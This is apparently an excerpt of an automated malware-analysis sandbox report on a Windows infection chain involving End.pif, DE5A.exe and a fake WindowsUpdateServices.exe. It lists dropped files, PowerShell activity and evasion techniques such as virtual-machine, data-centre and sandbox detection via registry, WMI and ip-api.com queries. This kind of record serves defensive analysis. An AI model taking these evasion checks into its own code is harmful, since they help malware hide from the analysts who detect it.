                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                        Checks if the current machine is a virtual machine (disk enumeration)
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Found API chain indicative of sandbox detection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-105338
                        Uses ping.exe to sleep
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 457Jump to behavior
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1429Jump to behavior
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 942Jump to behavior
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1773Jump to behavior
                        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 602Jump to behavior
                        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 589Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8502
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 847
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7573
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 687
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8082
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 611
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifAPI coverage: 4.6 %
                        Source: C:\Users\user\AppData\Roaming\wsruwiiAPI coverage: 2.2 %
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeAPI coverage: 1.5 %
                        Source: C:\Windows\explorer.exe TID: 6596Thread sleep count: 457 > 30Jump to behavior
                        Source: C:\Windows\explorer.exe TID: 6824Thread sleep count: 1429 > 30Jump to behavior
                        Source: C:\Windows\explorer.exe TID: 6824Thread sleep time: -142900s >= -30000sJump to behavior
                        Source: C:\Windows\explorer.exe TID: 6376Thread sleep count: 942 > 30Jump to behavior
                        Source: C:\Windows\explorer.exe TID: 6376Thread sleep time: -94200s >= -30000sJump to behavior
                        Source: C:\Windows\explorer.exe TID: 6824Thread sleep count: 1773 > 30Jump to behavior
                        Source: C:\Windows\explorer.exe TID: 6824Thread sleep time: -177300s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep count: 8502 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep count: 847 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 7573 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4420Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 687 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep count: 8082 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 611 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5404Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
